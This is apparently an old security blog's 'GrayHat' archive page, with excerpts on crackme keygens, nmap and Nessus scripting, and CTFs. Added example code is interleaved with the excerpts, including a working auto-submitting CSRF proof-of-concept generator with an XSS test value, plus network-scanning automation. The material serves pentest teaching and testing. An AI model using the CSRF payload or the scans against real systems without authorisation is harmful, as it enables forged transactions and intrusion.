Archive for the ‘GrayHat’ Category
Thursday, July 8th, 2010 by webstersprodigy
This is an update to http://webstersprodigy.net/2010/07/07/pydbg-reverseme-solution/. I change a register now to circumvent the isdebuggerpresent call.

import sys
import ctypes
from pydbg import *
from pydbg.defines import *

print "This is a very stupid keygen that uses a debug method and grabs the key from memory"
print "prints out the valid key, and writes it [...]
Tags: pydbg, python, reverseme
Posted in GrayHat, Programming | No Comments »
Wednesday, July 7th, 2010 by webstersprodigy
Last week I wrote a keygen here: http://webstersprodigy.net/2010/06/22/reverseme-windows-keygen/. This is an almost identical problem, but the binary has been patched to allow debugging (I may do this programmatically as well, but not yet). I wanted to solve this with programmatic debugging. Here is the exe: Ice9pch3. The code simply sets a breakpoint and prints the [...]
Tags: crackme, debugging, pydbg, python
Posted in GrayHat, Programming, windoze | 1 Comment »
Tuesday, June 22nd, 2010 by webstersprodigy
This one was challenging for me, and took me several hours, but was fun. I got caught up on certain parts that may not have been too difficult, but, yeah… http://crackmes.de/users/tripletordo/ice9/ You can download the executable here Ice9.zip. The first thing I noticed is probably the ‘trick’ which was simply a call to isdebuggerpresent. I [...]
Tags: crackmes, IDA, keygen, ollydbg
Posted in Bits and Bytes, GrayHat | No Comments »
Thursday, June 10th, 2010 by webstersprodigy
http://crackmes.de/users/d0min4ted/keygenme_by_d0min4ted/ In case the link goes away, here is a zip of the executable: crackme. I cheated on this one and used Reflector. This was an excuse for me to try Reflector out… so I started with that in mind. The checking code ends up being in crackme->WindowsFormsApplication4->Form1. You can deduce what most of the buttons do. [...]
Tags: C sharp, reflector, reversing
Posted in Computers, GrayHat | No Comments »
Tuesday, June 8th, 2010 by webstersprodigy
To get back into the groove, I decided to try a crackme. After searching far and wide, I can’t seem to find where I got this from, other than crackmes.de. One of my favorite sites. Crackme.zip <– here it is in case it’s deleted. And the solution is, with no analysis:

#include <iostream>
#include <string>
using [...]
Posted in Bits and Bytes, Computers, GrayHat | 1 Comment »
Wednesday, April 7th, 2010 by webstersprodigy
The title sort of explains it.

description = [[
Attempts to check if a login page exists on the port.
]]

---
-- @output
-- 80/tcp open http
-- |_ http-login-form: HTTP login detected
--
-- HTTP authentication information gathering script
-- rev 1.0 (2010-02-06)

author = "Rich Lundeen <mopey@webstersprodigy.net>"
license = "Same as Nmap--See http://nmap.org/book/man-legal.html" [...]
Tags: lua, nmap
Posted in GrayHat, Network, Programming | No Comments »
Wednesday, February 3rd, 2010 by webstersprodigy
A PoC for XSRFs that only allow POST is not as straightforward as the GET case. I use something like the following for situations like that.

<html>
<head></head>
<body>
<script>
function poststuff() {
  var site = document.getElementById("posturl").value;
  var post_data = document.getElementById("postparam").value;
  alert("site: " + site);
  alert("pdata: " + post_data);
  var xmlhttp = new XMLHttpRequest();
  xmlhttp.open("POST", site, true);
  xmlhttp.onreadystatechange = function [...]
Tags: xsrf
Posted in GrayHat | No Comments »
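A form-based way to build the same POST PoC, as an added example and not the post's own code. It matters which vehicle carries the request: a cross-origin XMLHttpRequest does not send the victim's cookies unless withCredentials is set, and then the target has to answer with CORS headers, whereas a plain HTML form submission from the attacker's page carries the victim's cookies with no such conditions. The generator below writes an auto-submitting form and HTML-escapes every attribute value, so a parameter containing quotes or angle brackets cannot break out of its input tag. The target URL and parameters used in the demo are constructed for illustration.

```python
import html
from urllib.parse import urlencode


def csrf_post_poc(action_url, params, auto_submit=True):
    """Return an HTML page whose form POSTs `params` to `action_url`.

    Every attribute value goes through html.escape(quote=True), so values
    with '"', '<' or '&' stay inside their own input element."""
    inputs = "\n".join(
        '    <input type="hidden" name="{}" value="{}">'.format(
            html.escape(str(name), quote=True), html.escape(str(value), quote=True)
        )
        for name, value in params.items()
    )
    # The script tag submits the form as soon as the page loads; leave it out
    # to get a page the tester clicks manually while watching a proxy.
    submit = (
        "  <script>document.getElementById('xsrf').submit();</script>\n"
        if auto_submit
        else ""
    )
    return (
        "<!DOCTYPE html>\n"
        "<html><body>\n"
        '  <form id="xsrf" method="POST" action="{action}">\n'
        "{inputs}\n"
        '    <input type="submit" value="go">\n'
        "  </form>\n"
        "{submit}"
        "</body></html>\n"
    ).format(action=html.escape(action_url, quote=True), inputs=inputs, submit=submit)


def csrf_get_poc(action_url, params):
    """The straightforward GET case: an <img> the browser fetches on load.
    urlencode builds the query string; html.escape protects the attribute."""
    url = action_url + "?" + urlencode(params)
    return '<img src="{}" alt="">\n'.format(html.escape(url, quote=True))


if __name__ == "__main__":
    # Constructed target and parameters; nothing here is a real site.
    page = csrf_post_poc(
        "https://bank.example/transfer",
        {"to": "attacker", "amount": "100", "note": '"><script>alert(1)</script>'},
    )
    with open("xsrf_poc.html", "w") as fh:
        fh.write(page)
    print(page)
```

Open the written file in a browser that has a session on the target to exercise the PoC. One caveat a tester needs today: browsers that default cookies to SameSite=Lax will not attach the session cookie to a cross-site top-level POST, so a form PoC that worked against a site in 2010 only works now if the cookie is explicitly SameSite=None or the site has no other protection relying on it.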
Sunday, January 3rd, 2010 by webstersprodigy
The code is pretty self explanatory. It searches through a .nessus file and spits out matching hosts.
Tags: nessus, python
Posted in GrayHat, Programming | No Comments »
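A search over a .nessus file of the kind the post describes, as an added example rather than the post's own script. It walks the NessusClientData_v2 layout (ReportHost elements holding ReportItem findings) with the standard library XML parser and returns the hosts whose findings match a plugin ID, a plugin-name pattern, or a minimum severity. The embedded report is constructed for the example; its addresses, plugin IDs and findings are illustrative.

```python
import re
import xml.etree.ElementTree as ET

# Constructed .nessus (NessusClientData_v2) sample; not from a real scan.
SAMPLE_NESSUS = """<NessusClientData_v2>
<Report name="lab">
  <ReportHost name="10.0.0.5">
    <HostProperties>
      <tag name="host-ip">10.0.0.5</tag>
      <tag name="operating-system">Linux Kernel 2.6</tag>
    </HostProperties>
    <ReportItem port="22" svc_name="ssh" protocol="tcp" severity="0"
                pluginID="10267" pluginName="SSH Server Type and Version Information">
      <plugin_output>SSH-2.0-OpenSSH_5.3</plugin_output>
    </ReportItem>
    <ReportItem port="80" svc_name="www" protocol="tcp" severity="2"
                pluginID="11213" pluginName="HTTP TRACE / TRACK Methods Allowed"/>
  </ReportHost>
  <ReportHost name="10.0.0.9">
    <HostProperties><tag name="host-ip">10.0.0.9</tag></HostProperties>
    <ReportItem port="445" svc_name="cifs" protocol="tcp" severity="3"
                pluginID="57608" pluginName="SMB Signing not required"/>
  </ReportHost>
</Report>
</NessusClientData_v2>
"""


def _root(source):
    """Accept either the XML text itself or a path to a .nessus file."""
    if source.lstrip().startswith("<"):
        return ET.fromstring(source)
    return ET.parse(source).getroot()


def find_hosts(source, plugin_id=None, name_pattern=None, min_severity=0):
    """Return {host: [(port, protocol, pluginName), ...]} for every
    ReportItem that satisfies all the given filters.

    Severity uses the Nessus scale 0..4 (info .. critical); name_pattern is
    a case-insensitive regular expression over pluginName."""
    root = _root(source)
    wanted = None if name_pattern is None else re.compile(name_pattern, re.I)
    matches = {}
    for host in root.iter("ReportHost"):
        name = host.get("name")
        for item in host.iter("ReportItem"):
            if plugin_id is not None and item.get("pluginID") != str(plugin_id):
                continue
            if wanted is not None and not wanted.search(item.get("pluginName", "")):
                continue
            if int(item.get("severity", "0")) < min_severity:
                continue
            matches.setdefault(name, []).append(
                (item.get("port"), item.get("protocol"), item.get("pluginName"))
            )
    return matches


if __name__ == "__main__":
    import sys

    # usage: python nessus_grep.py report.nessus "smb signing"
    src = sys.argv[1] if len(sys.argv) > 1 else SAMPLE_NESSUS
    pattern = sys.argv[2] if len(sys.argv) > 2 else "smb"
    for host, items in sorted(find_hosts(src, name_pattern=pattern).items()):
        print(host, "; ".join("%s/%s %s" % it for it in items))
```

ET.parse reads the whole report into memory, which is fine for a single scan; for multi-gigabyte exports switch to ET.iterparse and clear each ReportHost after it has been examined.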
Wednesday, December 30th, 2009 by webstersprodigy
Kind of an annoying problem, but sometimes nikto runs out of control. This is made worse by nessus, which can have a lot of nikto instances running at once.
Tags: nikto, python
Posted in GrayHat, Programming | No Comments »
Wednesday, October 14th, 2009 by webstersprodigy
This is a stupid script to scan a class B network. I only wanted a detailed scan of hosts that exist (which I generated with a ping scan). I also wanted this information separated by file.
Tags: nmap
Posted in GrayHat, Network, Programming | 2 Comments »
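The ping-sweep-then-detailed-scan procedure above, as an added example (not the post's script): it parses the grepable output of a ping sweep (nmap -sn -oG -, which older releases spelled -sP), keeps only hosts reported Up, and builds one detailed scan per host with its own -oN output file. Two details a practitioner cares about are that every address is validated with the ipaddress module before it is used, and that nmap is invoked through an argv list rather than a shell, so nothing read from the sweep file can be interpreted as shell syntax. The sample sweep output and the scan options are constructed for the example.

```python
import ipaddress
import re
import subprocess
from pathlib import Path

# Constructed sample of `nmap -sn -oG -` output; the addresses are illustrative.
SAMPLE_SWEEP = """# Nmap 5.21 scan initiated as: nmap -sn -oG - 10.1.0.0/16
Host: 10.1.0.1 (gw.lab)\tStatus: Up
Host: 10.1.0.7 ()\tStatus: Up
Host: 10.1.0.8 ()\tStatus: Down
Host: 10.1.2.40 ()\tStatus: Up
# Nmap done at ...: 65536 IP addresses (3 hosts up) scanned
"""

# Grepable format: "Host: <addr> (<name>)<tab>Status: <state>"
HOST_LINE = re.compile(r"^Host:\s+(\S+)\s+\(([^)]*)\)\s+Status:\s+(\w+)")


def hosts_up(grepable):
    """Return the addresses a grepable ping sweep reports as Up.

    Each address is round-tripped through ipaddress so that only a real
    IPv4/IPv6 address ever reaches a command line or a file name."""
    up = []
    for line in grepable.splitlines():
        m = HOST_LINE.match(line)
        if not m or m.group(3) != "Up":
            continue
        try:
            up.append(str(ipaddress.ip_address(m.group(1))))
        except ValueError:
            continue  # not an address: drop it rather than pass it on
    return up


def scan_argv(ip, outdir, options=("-sV", "-O", "-p-")):
    """argv for one detailed scan, normal output to <outdir>/<ip>.nmap.
    Returned as a list so subprocess runs it without a shell."""
    out = Path(outdir) / (ip.replace(":", "_") + ".nmap")
    return ["nmap", *options, "-oN", str(out), ip]


def scan_all(grepable, outdir, run=subprocess.run):
    """Run one detailed scan per live host. `run` is injectable so the plan
    can be inspected (dry run) before nmap is actually started."""
    Path(outdir).mkdir(parents=True, exist_ok=True)
    return [(ip, run(scan_argv(ip, outdir))) for ip in hosts_up(grepable)]


if __name__ == "__main__":
    import sys

    # usage: nmap -sn -oG - 10.1.0.0/16 > sweep.gnmap; python per_host.py sweep.gnmap out/
    sweep = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_SWEEP
    outdir = sys.argv[2] if len(sys.argv) > 2 else "scans"
    for ip, argv in scan_all(sweep, outdir, run=lambda a: a):
        print(" ".join(argv))
```

Running the module directly only prints the commands; pass the default subprocess.run (or drop the run= argument) to execute them, and set options to whatever detail level the engagement allows.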
Tuesday, August 11th, 2009 by webstersprodigy
http://www.milw0rm.com/exploits/9410
Tags: wordpress
Posted in GrayHat | 2 Comments »
Thursday, July 23rd, 2009 by webstersprodigy
http://kenshoto.com/vtrace/

Documented commands (type help <topic>):
========================================
alias     bpedit   detach  ignore      meta    resume    stepi    vstruct
alloc     bpfile   dis     lm          mode    script    struct   writemem
attach    break    eval    maps        ps      search    suspend
autocont  bt       exec    mem         python  server    syms
bestname  call     fds     memdump     quit    signal    threads
bp        config   go      memprotect  reg     snapshot  var

So this looks [...]
Posted in GrayHat | No Comments »
Wednesday, July 8th, 2009 by webstersprodigy
The GNU Privacy Handbook has a ton of useful information, but I thought I’d make a quick reference for the gpg usage I use most. Especially because I was just an idiot and lost my gpg private key (though I do remember the passphrase) – this time there will be a backup! List all keys [...]
Posted in GrayHat, Linux | No Comments »
Friday, May 8th, 2009 by webstersprodigy
I am doing some research that involves a *lot* of google searches. Because this research involves a significant number of directed queries, it seems logical to hide this information as much as practical. If there is a web host who notices sequential names in a Google referer URL repeatedly, this might raise suspicion or alter behavior which could skew results. Similarly, it is desirable to hide IP information from both the web host (for similar reasons) and possibly even search engines.
Tags: firefox, tor, ubuntu
Posted in GrayHat, Linux, Network | No Comments »
Wednesday, April 22nd, 2009 by webstersprodigy
Posted in GrayHat, Linux, windoze | No Comments »
Thursday, April 9th, 2009 by webstersprodigy
This is an oldie but goodie. I’ve seen format string bugs in the past, and have even exploited a few using the “magic formula”. Today, I thought it would be a good time to actually sit down and figure out how they work. The below link is an excellent resource to anyone learning about these: http://www.cgsecurity.org/Articles/SecProg/Art4/
Posted in GrayHat | 1 Comment »
Wednesday, March 18th, 2009 by webstersprodigy
For the security class I’m teaching we recently had a box to pwn. Problem is, they would sometimes get the address wrong and crash the virtual system. I probably would have just distributed the vdi, but not all of them have machines robust enough to run a vm, so I had to set something up.
Tags: virtualbox
Posted in GrayHat, Linux, windoze | 1 Comment »
Tuesday, March 3rd, 2009 by webstersprodigy
This is a progress report related to Disclosure.
Posted in GrayHat | No Comments »
Monday, December 22nd, 2008 by webstersprodigy
“The pixels in the above image are numbered 0..99 for the first row, 100..199 for the second row etc. White pixels represent ascii codes. The ascii code for a particular white pixel is equal to the offset from the last white pixel. For example, the first white pixel at location 65 would represent ascii code 65 (‘A’), the next at location 131 would represent ascii code (131 – 65) = 66 (‘B’) and so on.
Tags: hackthissite, python
Posted in GrayHat, Programming | No Comments »
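The decoding rule quoted above, carried through in code as an added example (not the post's solution): pixels are numbered row-major in a 100-wide image, and each white pixel's index minus the previous white pixel's index is one ASCII code, with the first white pixel measured from 0. The decoder works on a flat pixel list or on (x, y) coordinates, and an encoder is included so the rule can be checked against the post's own example ('A' at 65, 'B' at 131). The image width and the sample message are the example's own assumptions.

```python
WIDTH = 100  # assumption from the post: 100 pixels per row, numbered from 0


def decode_pixels(pixels):
    """Decode a row-major image: one truthy value per white pixel.

    Each white pixel's index minus the previous white pixel's index is an
    ASCII code; the first white pixel is measured from index 0."""
    out = []
    last = 0
    for index, white in enumerate(pixels):
        if not white:
            continue
        code = index - last
        if not 0 <= code < 128:
            raise ValueError("offset %d at pixel %d is not ASCII" % (code, index))
        out.append(chr(code))
        last = index
    return "".join(out)


def decode_coordinates(white_xy, width=WIDTH):
    """Decode from (x, y) coordinates of the white pixels, as an image
    library yields them. They are sorted into raster order first, because
    the offsets only make sense along the row-major numbering."""
    indices = sorted(y * width + x for x, y in white_xy)
    pixels = [0] * (indices[-1] + 1) if indices else []
    for i in indices:
        pixels[i] = 1
    return decode_pixels(pixels)


def encode_message(text, width=WIDTH):
    """Inverse of decode_pixels: returns (pixels, height) for a row-major
    image just tall enough to hold the message."""
    positions, pos = [], 0
    for ch in text:
        if ord(ch) >= 128:
            raise ValueError("ASCII only")
        pos += ord(ch)
        positions.append(pos)
    height = positions[-1] // width + 1 if positions else 1
    pixels = [0] * (width * height)
    for p in positions:
        pixels[p] = 1
    return pixels, height


if __name__ == "__main__":
    # Constructed sample message; round-trips through the encoding rule.
    image, rows = encode_message("Hello, world")
    print("image is %d x %d, %d white pixels" % (WIDTH, rows, sum(image)))
    print(decode_pixels(image))
```

For the real challenge image, Pillow gives the flat list directly: list(Image.open(path).convert("1").getdata()) yields 0 for black and 255 for white, which decode_pixels treats as false and true.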
Friday, August 15th, 2008 by webstersprodigy
Defcon 16 was a lot of fun. There were a lot of fun challenges, but my favorite was probably the wargames reverseme in open capture the flag.
Tags: ctf, defcon, reversing
Posted in GrayHat | No Comments »